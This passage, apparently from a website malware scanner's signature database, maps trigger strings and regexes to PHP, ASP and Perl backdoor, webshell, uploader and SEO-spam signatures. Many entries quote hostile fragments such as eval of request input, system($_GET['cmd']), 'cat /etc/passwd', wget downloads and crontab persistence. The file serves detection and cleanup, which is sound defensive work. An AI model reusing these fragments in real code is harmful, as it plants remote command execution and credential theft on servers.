			'$_F=__FILE__;$_X=\'Pz48P3BocA0KNXJyMn'=> array(STR_CLEAR_MULTIMATCH,  'php.backdoor.webshell.221', '\$_F=__FILE__;\$_X=.Pz48P3BocA0KNXJyMn[^<>]+?eval\([^;]+;'),
		),

		'header("HTTP/1.0 404 Not Found");exit;' => array(STR_TRIGGER,
			'HTTP_USER_AGENT' => array(STR_CLEARFILE, 'php.backdoor.generic.039', NULL),
		),

		'Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEw' => array(STR_CLEAR_MULTIMATCH,  'php.backdoor.beandoor.002.001', '\$OOO000000=urldecode[^>]+\$_F=__FILE__;\$_X=.Pz48P3BocA0KDQovKioNCiA[^;]+;eval\(\$OOO0000O0[^;]+\);'),
		'$_F=__FILE__;$_X=\'Pz48P3BocCANCiQzcmwg' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.002.004', '\$_F=__FILE__;\$_X=.Pz48P3BocCANCiQzcmwgPS[^;]+;eval.base64_decode[^;]+wOyRfWD0wOw==...;'),
		'$_F=__FILE__;$_X=\'Pz48P3BocA0KJDEzdGhfcDFzcyA9IG1kaSgiYjUxbmQyMnIiKTsNCiRjMmwyciA' => array(STR_CLEARFILE,  'php.backdoor.beandoor.002.003', NULL),
		'$_F=__FILE__;$_X=\'Pz48P3BocCA0Zig0c3M1dCgkX0dFVFsi' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.001.003', '\$_F=__FILE__;\$_X=.Pz48P3BocCA0Zig0c3M1dCgkX0dFVFsi[^<>]+?\beval\([^<>]+?\'\)\);'),
		'$_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.004', '\$_F=__FILE__;\$_X=.Pz48P3BocCAkM3JsID0gJ2h0dH[^<>]+?\beval\([^<>]+?\'\)\);\s*\$ua[^<>]+?echo \$tmp;'),
		'$_F=__FILE__;$_X=\'Pz48P3BocA0KDQoNCg0KDQo0ZigkMTN0' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.005', '\$_F=__FILE__;\$_X=.Pz48P3BocA0KDQoNCg0KDQo0Zi[^<>]+?;eval\(base64_decode\([^<>]+?\'\)\);'),
		'$_F=__FILE__;$_X=\'Pz48P3BocCAjIFc1YiBTaDVsbCBie' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.006', '\$_F=__FILE__;\$_X=.Pz48P3B[^<>]+?;eval\(base64_decode\([^<>]+?\'\)\);'),
		'bDVfZzV0X2MybnQ1bnRzKCQzcmwpOw0KNWNoMiAkYzJudDVudHM7DQo/Pi' => array(STR_CLEARFILE, 'php.spam-seo.injector.275', NULL),
		'Pz48P3BocA0KJDNybCA9ICghNW1wdHkoJF9TRVJ' => array(STR_CLEARFILE, 'php.backdoor.webshell.175', NULL),
		'$_F=__FILE__;$_X=\'Pz48ZDR2IDRkPSJjcjV' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.302', '\$_F=__FILE__;\$_X=.Pz48[^;]+;[\s]*eval\([^;]+\);'),
	),

	'error_reporting' => array(STR_TRIGGER,

		'echo' => array(STR_TRIGGER,

			'header("Content-Type:' => array(STR_TRIGGER,
				'header("Location:' => array(STR_TRIGGER,
					'->extractTo(uhex($_GET' => array(STR_CLEARFILE, 'php.backdoor.webshell.184', NULL),
				),
			),

			'$shadow1 = "/home/$usr/etc/$domain/shadow";' => array(STR_TRIGGER,
				'@mkdir("/home/$usr/etc/$domain");' => array(STR_CLEARFILE, 'php.backdoor.adduser.003', NULL),
			),

			'error_reporting(0);' => array(STR_TRIGGER,
				'@unlink(__FILE__);' => array(STR_CLEARFILE, 'php.backdoor.uploader.221', NULL),
			),

			'// check if shell' => array(STR_CLEARFILE, 'php.backdoor.shell_get.003', NULL),
		),

		';error_reporting(0);if(!defined(' => array(STR_TRIGGER,
			';(PHP_OS==' => array(STR_TRIGGER,
				')@include(' => array(STR_CLEAR_LINEMATCH, 'php.malware.GLOBALS.008.02', '\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*[^\n]+@?include[^\n]+'),
			),
		),

		'urldecode(\'%' => array(STR_TRIGGER,
			'set_time_limit\(0\);[\s]*error_reporting\(0\);\$[0O]+[\s]*=[\s]*urldecode\(.%[^;]+\);[^_]+__FILE__;[^_]+preg_replace\(' => array(REX_CLEARFILE, 'php.backdoor.b374k-shell.014', NULL),
		),

		'if (base64_encode($paths[0])' => array(STR_TRIGGER,
			'$zipFiles = glob($currentPath . DIRECTORY_SEPARATOR . $path . DIRECTORY_SEPARATOR . \'*.zip\');' => array(STR_CLEARFILE, 'php.malware.dropper.038', NULL),
		),

		'ID8+PD9waHAgZnVuY3Rpb24gc3RyZGlyKCRzdHIpIHsgcmV0dXJuIHN0cl9yZXBsYWNlKGFycmF5KCdcXCcs' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.006.02', NULL),
	),

	'HTTP_USER_AGENT' => array(STR_TRIGGER,

		'<!-- <urls>' => array(STR_TRIGGER,
			'),\'tmp\',0)>0)return 0;if($GLOBALS[\'_' => array(STR_CLEARFILE, 'php.spam-seo.injector.288', NULL),
			'),\\\'tmp\\\',0)>0)return 0;if($GLOBALS[\\\'_' => array(STR_CLEARFILE, 'php.spam-seo.injector.288.02', NULL),
		),

		'(preg_match(\'/admin|wp-login.php|wp-admin|administrator/i\',$_SERVER[\'REQUEST_URI\'])' => array(STR_TRIGGER,
			'if ( stristr($cookie, \'wordpress_logged_in_\')' => array(STR_CLEARFILE, 'php.backdoor.wp_login.003', NULL), 
		),

		'{die("<html><head><script>document.cookie=' => array(STR_TRIGGER,
			'if(!preg_match(\'/bot/\',@$_SERVER[\'HTTP_USER_AGENT\']) && preg_match' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.125', 'if\(!preg_match\(..bot..,@\$_SERVER\[.HTTP_USER_AGENT[^\}]+exit;[\s]*\}'),
		),

		'Firesh' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.firesh.001', 'if\s*\(stri?pos.._SERVER..HTTP_USER_AGENT..,.Firesh[^>]+echo.<form name=.[^<]+<input type=.file. name..my_file_upl[^\}]+exit;\s*\}'),
		'basename($f, ".php") == "index")' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.196', '(if[\s]*\(\(!\()?\$[\w]+[\s]*=[\s]*pathinfo\(\$f[\s]*=[\s]*strtok\(\$[\w]+[\s]*=[\s]*@\$_SERVER\[.REQUEST_URI.\],[\s]*.\?.\),[\s]*PATHINFO_EXTENSION\)[^>]+strlen\(\$data\)[\s]*>[^>]+\$code\);[\s]*exit;[\s\}]+'), // improved by Luke Leal; imp PG 11/2018
	),

	'CURLOPT_USERAGENT' => array(STR_TRIGGER,

		'DIRECTORY_SEPARATOR' => array(STR_TRIGGER,

			'css' => array(STR_TRIGGER,
				'lnk' => array(STR_TRIGGER,
					'$tlng' => array(STR_CLEARFILE, 'php.spam-seo.injector.293', NULL),
				),
			),

			');return $a[$i];}  if(!empty($_SERVER[_' => array(STR_CLEARFILE, 'php.backdoor.injector.134', NULL),
		),

		'function arr_trim($arr)' => array(STR_TRIGGER,
			'arr_trim(read_file(' => array(STR_CLEARFILE, 'php.hacktool.site_scanner.003', NULL),
		),
	),

	'preg_replace' => array(STR_TRIGGER,

		'*/preg_replace/*' => array(STR_TRIGGER,
			'*/rawurldecode/*' => array(STR_TRIGGER,
				'*/, \'\', __FILE__/*' => array(STR_CLEARFILE, 'php.backdoor.eval_xor.004', NULL),
			),
		),

		'gzinflate(urldecode($content))' => array(STR_TRIGGER,
			'preg_match_all(\':>([^<]+)<:iUs\', php_strip_whitespace(__FILE__), $matches) and isset($matches[1][1]))' => array(STR_CLEARFILE, 'php.malware.dropper.032', NULL),
		),
	),

	'; unlink(__FILE__); /*' => array(STR_TRIGGER, 

		'*/ ?>' => array(STR_TRIGGER, 
			'<?php echo "' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.autodestroy.001', '<\?php\s*echo\s*[\'"]\w+[\'"];\s*unlink\(\s*__FILE__\s*\);\s*\/\*\w+\*\/\s*\?>'),
		),

		'),base64_decode(\\\'PD9waHAgQGZp' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.059', '\@file_put_contents\(base64_decode\(.[\'"]d3At[^\)]+\),\s*base64_decode\(.[\'"]PD9waHAgQGZpbGVfcHV0X2NvbnR[^\)]+\)\)\s*;(?:\s*unlink\(__FILE__\);\s*\/\*\'\);)?'),
	),

	'umask(0);' => array(STR_TRIGGER,
		'require_once MAGENTO . \'/../app/Mage.php\';' => array(STR_TRIGGER,
			'$user = Mage::getModel(\'admin/user\')->loadByUsername(' => array(STR_TRIGGER,
				'header(\'Location: \' . $redirectUrl);' => array(STR_TRIGGER,
					'$redirectUrl = Mage::getSingleton(\'adminhtml/url\')->getUrl(Mage::getModel(\'admin/user\')->getStartupPageUrl(), array(\'_current\' => false));' => array(STR_CLEARFILE, 'php.hacktool.magento-credential-stealer.004', NULL),
				),
			),
		),
	),

	'exit();' => array(STR_TRIGGER,
		'usleep(' => array(STR_TRIGGER,
			'unlink(__FILE__);' => array(STR_TRIGGER,
				'= @fopen($' => array(STR_CLEARFILE, 'php.malware.file_exists.002', NULL),
			),
		),
	),

	'foreach (array(@$' => array(STR_TRIGGER,
		'(get_defined_vars()));' => array(STR_TRIGGER,
			')) { continue; } $' => array(STR_TRIGGER,
				'.= \'_\' . $' => array(STR_CLEARFILE, 'php.malware.obfuscated.049', NULL),
			),
		),
	),

	'@unlink(__FILE__);' => array(STR_TRIGGER,
		'if($_REQUEST[\'pass\']' => array(STR_TRIGGER,
			'$redirect_to = user_admin_url();' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.007', NULL),
		),
	),

	'$_POST = array_map(' => array(STR_TRIGGER,
		'register_activation_hook(__FILE__, array(&$words_links, \'activate\'));' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.008', NULL),
	),

	'perm-folders.log' => array(STR_TRIGGER,
		'function GetListFiles' => array(STR_CLEARFILE, 'php.hacktool.perm-folders.001', NULL),
	),

	'(preg_match("#/\*\*(.*)\*\*/#se"' => array(STR_TRIGGER,
		' file(__FILE__)),$match)?($match[1]):"")."' => array(STR_CLEARFILE, 'php.backdoor.filesman.034', NULL),
	),

	'#/\*\*SSL_START(.*)SSL_END\*\*/#s' => array(STR_TRIGGER,
		'(__FILE__),$match);$key=$match[1];' => array(STR_CLEARFILE, 'php.malware.obfuscated.017', NULL),
	),

	'$rand=rand(999,99999);' => array(STR_TRIGGER,
		'if(isset($_GET[\'del\']))' => array(STR_CLEARFILE, 'php.hacktool.mailer.100', NULL),
	),

	'include dirname(' => array(STR_TRIGGER,
		'<\?php[\s]*@?include[\s]*dirname\(__FILE__\)[\s]*.[\s]*.\/[\w]*\.txt' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.059', '@?include[\s]*dirname\(__FILE__\)[\s]*.[\s]*.\/[\w]*\.txt.;'),
	),

	'$fgood = fopen(__FILE__, \'w\');' => array(STR_TRIGGER,
		'$fgood = fopen($path.$filename, \'w\');' => array(STR_CLEARFILE, 'php.backdoor.uploader.322', NULL),
	),

	'"-;-";' => array(STR_TRIGGER,
		'"-;-";[\s]*\$[\w]+[\s]*=[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*(\$[\w]+\{[\d]+\}[\s]*\.[\s]*){5}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.130', '"-;-";[\s]*\$[\w]+[\s]*=[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*(\$[\w]+\{[\d]+\}[\s]*\.[\s]*){5}[^\n]+"-;-";'),
	),

	'$sfolders[count($sexpl)][] = $droot."||".str_replace($droot,"",$_wfolders_);' => array(STR_CLEARFILE, 'php.malware.component.005', NULL),
	'array_unshift($templates, ___REALDOCROOT' => array(STR_CLEARFILE, 'php.spam-seo.injector.090', NULL),
	'<input name="todir" type="text" id="todir" value="__dodo__" size="15">' => array(STR_CLEARFILE, 'php.backdoor.dodo_zip.001', NULL),
	'$c2."admintask.txt","kodirovka"' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.011', NULL),
	'if (strpos("@!#%xrenoder^&*()"' => array(STR_CLEARFILE, 'php.spam-seo.xrenoder.001', NULL),
	'header(\'WWW-Authenticate: Basic realm="Powered By RAB3OUN"\');' => array(STR_CLEARFILE, 'php.backdoor.whcms_killer.001', NULL),
	'9ICRyb290LiIvX2Rvb3J3YX' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.061', '\$[O0]+=urldecode\(.%[^\(]+;eval\(\$[0O]+\(.aWY[^;]+9ICRyb290LiIvX2Rvb3J3YX[^;]+\)\);'),
	'sendPost($userName,$_POST[\'pass1\'],\'http' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.006', NULL),
	'mainwall.org' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.006.02', NULL),
	'isset($_POST[\'add-user-mysql-method\']' => array(STR_CLEARFILE, 'php.hacktool.wp_users.003', NULL),
	'>DONE!</span>' => array(STR_CLEARFILE, 'php.hacktool.packer.004', NULL),
),

'<%' => array(STR_TRIGGER,

	'request("' => array(STR_TRIGGER,

		're= request("a")' =>array(STR_TRIGGER,
			'execute re' => array(STR_CLEARFILE, 'asp.backdoor.execute.005', NULL),
		),

		'=Server.CreateObject("Scrip"&' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.008', NULL),
		'<%execute(request("' => array(STR_CLEAR_LINEMATCH, 'asp.backdoor.execute_request.001', 'execute.request[^\)]+\)\)'),
		'if request("password") <> "yt" Then' => array(STR_CLEARFILE, 'asp.backdoor.uploader.006', NULL),
		'htmls=chr(60)&chr(37)&"eval request("&chr(34)&"' => array(STR_CLEARFILE, 'asp.backdoor.backdoor_installer.001', NULL),
		'eval(play)' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.007', NULL),
		'sourceBody=GetResStr(siteUrl&"/"&queryStr)' => array(STR_CLEARFILE, 'asp.spam-seo.injector.019', NULL),
		'document.getElementById(\'linkbyme\').style.display=\'none\';' => array(STR_CLEARFILE, 'asp.spam-seo.doorway.003', NULL),
		'yumingid' => array(STR_CLEARFILE, 'asp.spam-seo.doorway.004', NULL),
	),

	'Server.CreateObject(' => array(STR_TRIGGER,

		'Dim' => array(STR_TRIGGER,

			'oProcess.BuildUploadRequest' => array(STR_TRIGGER,
				'ubound(uploadrequest.item(key).keys)' => array(STR_CLEARFILE, 'asp.backdoor.webshell.003', NULL),
			),

			'freeaspupload' => array(STR_CLEARFILE, 'asp.backdoor.uploader.013', NULL),
			'title=\'"&temp_title(0)&"\'><img border=\'0\' src=\'https://www.google.com/images/logos/google_logo_41' => array(STR_CLEARFILE, 'asp.spam-seo.doorway.001', NULL),

		),

		'execute body' => array(STR_CHAIN_TRIGGER,
			'Public Function GetHtml(url)' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector_gen.003', 'Public Function GetHtml\(url\)[^%]+GetHtml = objStream\.ReadText[\s]*objStream\.Close[\s]*End Function'),
			'body=GetHtml' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector_gen.003.02', 'body=GetHtml\([^\)]+\)[\s]*execute body[\s]*'),
			'Server.ScriptTimeout=' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector_gen.003.03', 'Server.ScriptTimeout=[\s]*[\d]+[\s]*'),
		),

		'Request.ServerVariables("HTTP_USER_AGENT' => array(STR_TRIGGER,
			'response.write jumpcode' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.009', NULL),
			'"h"&"t"&"t"&"p"&":"&"/"&"/"&"' => array(STR_CLEARFILE, 'asp.spam-seo.redirect_gen.001', NULL),
		),
	),

	'<script runat="server"' => array(STR_TRIGGER,

		'System.IO.Path.GetExtension(fileName);' =>array(STR_TRIGGER,
			'Server.HtmlEncode(FileUpload1.FileName);' => array(STR_CLEARFILE, 'asp.backdoor.uploader.014', NULL),
		),

		'new AjaxControlToo1kit.Ajax(' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector_gen.005', '\/\/\w+\s*new\s*AjaxControlToo1kit\.Ajax\(\"[^\"]+\"\);\s*\/\/\w+'),
		'popup(popup(System.Text.Encoding.Default.GetString' => array(STR_CLEARFILE, 'asp.backdoor.jspopup.001.01', NULL),
		'Sub RunPOP3Brute(ByVal' => array(STR_CLEARFILE, 'asp.backdoor.execute.006', NULL),
		'GetFiles_Dirs(base64Decode(args)' => array(STR_CLEARFILE, 'asp.backdoor.filesman.001', NULL),
		'.SaveAs(Server.MapPath' => array(STR_CLEARFILE, 'asp.backdoor.uploader.015', NULL),
	),

	'.SaveToFile' => array(STR_TRIGGER,
		'sys_password="' => array(STR_CLEARFILE, 'asp.backdoor.uploader.002', NULL),
		'url = clone_url&QUERYSTRING' => array(STR_CLEARFILE, 'asp.spam-seo.injector.016', NULL),
	),

	'shell' => array(STR_TRIGGER,
		'>Add xp_cmdshell(SQL2005)<' => array(STR_CLEARFILE, 'asp.backdoor.ASPXSpy.001', NULL),
		'sb.Append("Impersonation - Identification");' => array(STR_CLEARFILE, 'asp.backdoor.InsomniaShell.001', NULL),
	),

	'array("google","yahoo","bing","aol' => array(STR_TRIGGER,
		'Function GetHTTPPage(url)' => array(STR_TRIGGER,
			'Server.CreateObject(' => array(STR_TRIGGER,
				'GetHTTPPage' => array(STR_TRIGGER,
					'Response.Write strHtml' => array(STR_CLEARFILE, 'asp.spam-seo.generic.001', NULL),
				),
			),
		),
	),

	'Google Web Preview|bot|spider|wget' => array(STR_TRIGGER,
		'Set http = Nothing' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector.017', '<%\s*Set\s*http[^\(]+\(.Microsoft.XMLHTTP[^\|]+\|bot\|spider\|wget"[^"]+"HTTP_USER_AGENT[^\.]+\.Open\s*"GET",\s*"http[^,]+,\s*false\s*http.Send[^=]+=\s*Nothing\s*Set\s*regexn\s*=\s*Nothing\s*%>'),
	),

	'zehir' => array(STR_TRIGGER,
		'objFSO.CreateTextFile' => array(STR_CLEARFILE, 'asp.backdoor.zehir.001', NULL),
	),

	'<title>.:' => array(STR_TRIGGER,
		'3FEShell' => array(STR_CLEARFILE, 'asp.backdoor.3FEShell.001', NULL),
	),

	'regexn.pattern = "Google Web Preview|google|yahoo|msnbot"' => array(STR_TRIGGER,
		'if regexn.test(request.ServerVariables("HTTP_USER_AGENT")) then' => array(STR_CLEAR_MULTIMATCH, 'asp.spam-seo.injector.018', 'Set http[\s]*=[\s]*Server\.CreateObject[\s]*\(.Microsoft[^\)]+\)[\s]*set[\s]*regexn[\s]*=[\s]*new[\s]*regexp[^"]+regexn\.pattern[\s]*=[\s]*"Google Web Preview[^>]+Set regexn[\s]*=[\s]*Nothing'),
	),

	'(Replace(StrReverse(' => array(STR_TRIGGER,
		'(tseuqer lave")' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.009', NULL),
	),

	'function Getbot()' => array(STR_TRIGGER,
		's_agent,"googlebot",1)' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.005', NULL),
	),

	'SeRvEr AccEss d00r ]--</title>' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.009', NULL),
	'Coded By Pejvak' => array(STR_CLEARFILE, 'asp.backdoor.pejvak.001', NULL),
	'<title>Small System</title>' => array(STR_CLEARFILE, 'asp.backdoor.smallsystem.001', NULL), 
	'Dim InValue:InValue=Request(ConKey)' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.001', NULL),
	'Response.Write("bhssokbhss");' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.003', NULL),
	'XBCode="97a103a101a110' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.003.02', NULL),
	'&copy;CopyLeft 2006. Coded By rssn, Hebust.' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.004', NULL),
	'stm.SaveToFile server.MapPath("/"&cachefile&downfilename)' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.005', NULL),
	'<%response.write(now):eval(request(' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.003', NULL),
	'For iEn=0 To UBound(Daimaa)' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.006', NULL),
	'SysName="WanExplorer"' => array(STR_CLEARFILE, 'asp.backdoor.WanExplorer.001', NULL),
	'="AspRootkit 1.0 by BloodSword' => array(STR_CLEARFILE, 'asp.backdoor.AspRootkit.001', NULL),
	'Execute(chopper)' => array(STR_CLEARFILE, 'asp.backdoor.execute.004', NULL),
	'Dim action,password,pathname,pathname2,keywordindex' => array(STR_CLEARFILE, 'asp.backdoor.uploader.001', NULL),
	'dim upload,file,formName,formPath,iCount,upfileName,nowTime' => array(STR_CLEARFILE, 'asp.backdoor.uploader.003', NULL),
	'dim O0Oo000OO0O0,O0O000OO0O0,O00O000OO0O0' => array(STR_CLEARFILE, 'asp.spam-seo.injector.001', NULL),
	'Execute(OOOO(OOO))' => array(STR_CLEARFILE, 'asp.spam-seo.injector.002', NULL),
	'("k9E>=mk9625mkE:E=6mc_c ,}@E' => array(STR_CLEARFILE, 'asp.spam-seo.injector.003', NULL),
	'="&Request.ServerVariables("REMOTE_ADDR")&"&shell="&Request.ServerVariables("SERVER_NAME"))' => array(STR_CLEARFILE, 'asp.spam-seo.injector.004', NULL),
	'execute("Function AscDecrypt(AE9):AE9 = Replace(AE9,""u"",""-""):EncodeArr' => array(STR_CLEAR_LINEMATCH, 'asp.spam-seo.injector.013', 'execute\\("Function AscDecrypt\\(AE9\\):AE9 = Replace[^>]+execute.AscDecrypt.""[\\da]+""\)\)"\)'),
	'Request["\x61\x62\x63\x64"];eval' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.006', NULL),
	'bodyContext = replace(bodyContext, REDIRECT_DOMAIN, REDIRECT_MAIN_PATH)' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.008', NULL),
	'so"&"sos"&"pider,goo"&"g"&"lebot' => array(STR_CLEARFILE, 'vb.malware.generic.003', NULL),
),

'system(' => array(STR_TRIGGER,

	'echo' => array(STR_TRIGGER,

		'@system(' => array(STR_TRIGGER,

			'file_put_contents($' => array(STR_TRIGGER,

				'@system("killall' => array(STR_TRIGGER,
					'(crontab -l|grep -v crontab;echo;echo' => array(STR_CLEARFILE, 'php.backdoor.system_shell.017', NULL),
				),
				
				'| xargs grep -rl "<head"' => array(STR_CLEARFILE, 'php.malware.injector.056', NULL),
			),

			'@popen($' => array(STR_TRIGGER,
				'implode("\n",file($_GET[' => array(STR_CLEARFILE, 'php.backdoor.uploader.245', NULL),
				'elseif(function_exists(\'passthru\')){' => array(STR_CLEARFILE, 'php.backdoor.cmd_executer.002', NULL),
			),

			'$command = (exe(\'whoami\')) ? "ON" : "OFF";' => array(STR_CLEARFILE, 'php.backdoor.webshell.186', NULL),
		),

		'print' => array(STR_TRIGGER,
			'if(md5($_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.system.009', 'if\(md5\(\$_GET\[.\w+.\]\)\s*==.\w+.\)\s*{\s*echo\s*.<pre>.;\s*\$\w+\s*=\s*\(\$_GET\[.\w+.\]\);\s*\$\w+\s*=\s*system\(\$\w+\);\s*print\s*\$\w+;\s*echo\s*.<\/pre>.;\s*die;\s*}\s*else\s*{\s*print\s*.(-)?\d+.;\s*}'),
			'<input type=\"submit\" value=\"Upl0ad' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.010', NULL), 
		),

		'$wsonames = array(\'lndex' => array(STR_CLEARFILE, 'php.backdoor.uploader.240', NULL),
		'reboot"] == "yes") system(base64_decode("cHMgLWVmIH' => array(STR_CLEARFILE, 'php.backdoor.system.014', NULL),
		'system(base64_decode("Li9jbnJpZyAtYSBjcnlwdG9uaW' => array(STR_CLEARFILE, 'php.malware.cryptominer.007', NULL),
	),

	'eval' => array(STR_TRIGGER,

		'base64_decode' => array(STR_TRIGGER,
			'DQokYXV0aF9wYXNzID0gIiI7DQokY29sb3IgPS' => array(STR_CLEARFILE, 'php.backdoor.system_shell.008', NULL),
		),

		'Exec_Run("chmod ".$file' => array(STR_CLEARFILE, 'php.backdoor.system_shell.004', NULL),
	),

	'$_GET[\'cmd\'];' => array(STR_TRIGGER,
		'str_replace(\'@\',\' \',$x);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.system_shell.011', '\$x[\s]*=[\s]*\$_GET\[.cmd.\];[\s]*if[\s]*\(\$x<>..\)[\s]*\{[^}]+@?system\(\$x\);[\s]*exit;[\s]*\}'),
		'@file_put_contents($filename,base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.system.015', NULL),
	),

	'echo system' => array(STR_TRIGGER,
		'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[.[\w]+.\]\)\)[\s]*echo[\s]*system' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.system.016', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[.[\w]+.\]\)\)[\s]*echo[\s]*system[^;]+\);'),
		'echo system(base64_decode($_GET[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.system.018', 'echo system.base64_decode.._GET[^;]+;'),
	),

	'$_GET' => array(STR_TRIGGER,   
		'print system($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.system.009.02', '\$\w+\s*=\s*\$_GET\[.\w+.\]\s*;\s*if\s*\(md5\(\$\w+\)==.\w+.\)\s*{\s*\$\w+\s*=\s*\$_GET\[.\w+.\];\s*print\s*system\(\$\w+\);\s*}'),
	),

	'.txt; php -f ' => array(STR_TRIGGER,
		'system("cd ".$ar.";wget -O' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.005', NULL),
	),

	'IIIIIIIII' => array(STR_TRIGGER,
		'fclose($IIIIIIII' => array(STR_CLEARFILE, 'php.backdoor.system_shell.009', NULL),
	),

	'!isset($_COOKIE[md5(' => array(STR_TRIGGER,
		'<title></title>' => array(STR_CLEARFILE, 'php.backdoor.system_shell.012', NULL),
	),

	'add_action(\'plugins_loaded' => array(STR_TRIGGER,
		'$wp_filesystem->delete(ABSPATH.\'wp-content/plugins/\'.$' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.004', NULL),
	),

	'$cmd = array("wget $url -O ' => array(STR_CLEARFILE, 'php.backdoor.system_shell.016', NULL),
	'killall -9 perl' => array(STR_CLEARFILE, 'php.backdoor.system_shell.015', NULL),
	'host encrypt publickey.pub' => array(STR_CLEARFILE, 'php.backdoor.system_shell.014', NULL),
	'echo "<u>".php_uname(' => array(STR_CLEARFILE, 'php.backdoor.system_shell.013', NULL),
	'<title>Uploader' => array(STR_CLEARFILE, 'php.backdoor.system_shell.010', NULL),
	'echo nob0dyCr3w' => array(STR_CLEARFILE, 'php.backdoor.system_shell.007', NULL),
	'system("pwd;ls -lia;uname -a;cat /etc/passwd")' => array(STR_CLEARFILE, 'php.exploit.suphp.001', NULL),
	'print "[*] Spawning Shell \n' => array(STR_CLEARFILE, 'pl.backdoor.connectback.003', NULL),
	'@system($x);exit;' => array(STR_CLEARLINE, 'php.backdoor.shell-exec.001.001', '@system($x);exit;'),
	'{@system(' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.001.003', NULL),
	'echo "<pre>"; system($payload);' => array(STR_CLEAR_LINEMATCH,'php.backdoor.system.005', 'function hex2str..hex....return[^>]+if.._GET[^;]+;[\\s]*eval.._GET[^>]+<pre>";[\\s]*system..payload.;.}[\\s]*'),
	'system($_GET["a3kfj39f' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.rfi.001', 'error_reporting[^>]+base64_encode.._POST..l..[^>]+include_once.base64_decode..aHR0cDovL[^>]+sys_active..\s*.uname..a.;.[^>]+\}'),
	'if(isset($_REQUEST[\'cmd\'])){' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.001.004', NULL),
	';system($cmd);echo "</pre>";die;' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.shell-exec.002', 'if.isset.._REQUEST..\w+..\)\)\{\s*echo .<pre>.;\$cmd .[^<>]+;system..cmd.;echo .<.pre>.;die;\}'),
	'define(\'PHPSHELL_VERSION\', \'1.7\');' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.075', NULL),
	'system("$cmd 1> /tmp/cmdline 2>&1; cat /tmp/cmdline; rm /tmp/cmdline");' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.077', NULL),
	'ZGlzYWJsZV9mdW5jdGlvbnM9ZGw' => array(STR_CLEARFILE, 'php.hacktool.safemode-disabler.002', NULL),
	'print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: "' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.001', NULL),
	'my $cmd3 = encode_base64("uname -n");' => array(STR_CLEARFILE, 'pl.backdoor.revsliderexpoit.001.002', NULL),
	'print $fileHandle "AddHandler txt .php\n";' => array(STR_CLEARFILE, 'pl.hacktool.symlink.001', NULL),
	'if (getenv("MAYHEM_DEBUG"))' => array(STR_CLEARFILE, 'php.dropper.mayhem.001', NULL),
	'rename( \'idName.txt\', \'idName.php\' );' => array(STR_CLEARFILE,'php.backdoor.injector.106.03', NULL),
